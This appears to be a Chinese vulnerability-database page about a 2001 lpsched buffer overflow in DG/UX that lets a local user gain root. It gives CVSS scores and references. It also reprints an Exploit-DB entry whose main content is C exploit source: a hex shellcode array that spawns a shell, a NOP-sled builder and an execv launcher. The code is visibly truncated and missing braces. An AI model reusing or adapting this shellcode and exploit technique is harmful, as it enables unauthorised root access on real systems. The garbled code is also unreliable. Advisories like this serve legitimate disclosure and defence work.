发布时间 :2001-06-27 00:00:00
修订时间 :2017-12-18 21:29:19

[原文]Buffer overflow in lpsched on DGUX version R4.20MU06 and MU02 allows a local attacker to obtain root access via a long command line argument (non-existent printer name).


        DGUX R4.20MU06和MU02版本的lpsched存在缓冲区溢出漏洞。本地攻击者借助超长命令行参数(不存在的打印机名)获得根访问。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)


- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(UNKNOWN)  BUGTRAQ  20010319 DGUX lpsched buffer overflow
(UNKNOWN)  XF  dgux-lpsched-bo(6258)

- 漏洞信息

高危 缓冲区溢出
2001-06-27 00:00:00 2005-10-20 00:00:00
        DGUX R4.20MU06和MU02版本的lpsched存在缓冲区溢出漏洞。本地攻击者借助超长命令行参数(不存在的打印机名)获得根访问。

- 公告与补丁


- 漏洞信息 (20697)

DG/UX 4.20 lpsched Long Error Message Buffer Overflow Vulnerability (EDBID:20697)
unix local
2001-03-19 Verified
0 Luciano Rocha
N/A [点击下载]

DGUX is the Data General revision of UNIX. It is designed as a solution for Intel systems produced by Data General.

A problem in the handling of error messages by the printer scheduler could allow arbitrary execution of code. By placing a request to the lpsched program consisting of a long and non-existing host name, it is possible to take advantage of a buffer overflow in the error reporting code of the lpsched program.

Therefore, it is possible for a local user to execute arbitrary code with the euid of root. 

 *		Stack Smasher by Luciano Rocha, (c) 1999                      *
 *		 for dgux (Data General's UN*X) on x86                        *
 *									      *
 *	To compile: cc -o squash-dgux-x86 squash-dgux-x86.c		      *
 *									      *
 *	To use: squash-dgux-x86 <length> <program to squash> [params of prog] *
 *			EGG [other params of prog]			      *
 *									      *
 *	For a list of programs and their respective lengths see my home page, *
 *		currently at                       *
 *									      *
 *	My email:					      *
 *									      *
 *	Disclaimer: I take no responsability of whatever may result of using  *
 * 		this program nor I sugest ilegal use of it.		      *
 *			You are on your own.				      *

#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <unistd.h>

char maker[] = "Generic stack-smasher for dgux-x86 by Luciano Rocha, (c) 1999.\n";

char sc[] = {
	'E', 'G', 'G', '=',
	0x33, 0xc0, 0x33, 0xc9, 0x80, 0xc1, 0x68, 0x66, 0x51, 0x66, 0x68, 0x2f,
	0x73, 0x68, 0x2f, 0x62, 0x69, 0x6e, 0x8b, 0xdc, 0x50, 0x53, 0x80, 0xc1,
	0xdf, 0x66, 0x51, 0x50, 0x66, 0xba, 0x90, 0x9a, 0x66, 0x52, 0x66, 0x68,
	0x33, 0xc0, 0x66, 0x51, 0x50, 0x66, 0x52, 0x66, 0x68, 0x90, 0x58, 0x66,
	0x51, 0x50, 0x66, 0x52, 0x8b, 0xcc, 0x8b, 0xd3, 0x81, 0xc2, 0xf8, 0xff,
	0xff, 0xff, 0x52, 0x52, 0x53, 0x50, 0x04, 0x11, 0x50, 0x51, 0x04, 0x25,
	0xc3, 0x00

int prepare2(int argc, char *argv[]) {
	int len, off;
	char *buff;
	if (argc < 4) {
		fprintf(stderr, "%s <size> <prog_to_smash> [args] EGG "
			"[args].\n", argv[0]);
	for (off = 1; off < argc && strcmp(argv[off], "EGG"); ++off);
	if (off >= argc) {
		fprintf(stderr, "%s: no EGG parameter specified. Aborting.\n",
	len = strtol(argv[1], NULL, 0);
	buff = (char *) malloc(len + 1);
	buff[len] = '\0';
	memset(buff, 0x90, len);
	argv[off] = buff;
	execv(argv[0], argv+2);
	return 1;

int dosquash(int argc, unsigned char *argv[]) {
	char *p;
	int pos, ptr;
	int *d;

	p = getenv("EGG");
	fprintf(stderr, "%s: EGG == %p, EGG[0] == 0x%x\n", argv[0], p, *p);
	pos = 1;
	while (argv[pos] && *argv[pos] != 0x90) ++pos;
	if (!argv[pos]) {
		fprintf(stderr, "%s: no place to squash...\n", argv[0]);
	d = (int *) argv[pos];
	ptr = (int) p;
	while (*d == 0x90909090) *d++ = ptr;
	execv(argv[0], argv);
	return 1;

int main(int argc, char *argv[]) {

	if (getenv("EGG")) dosquash(argc, (unsigned char **)argv);
	else prepare2(argc, argv);
	return 1;

- 漏洞信息

DG/UX lpsched Command Line Argument Local Overflow
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

- 时间线

2001-03-20 Unknow
2001-03-20 Unknow

- 解决方案


Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete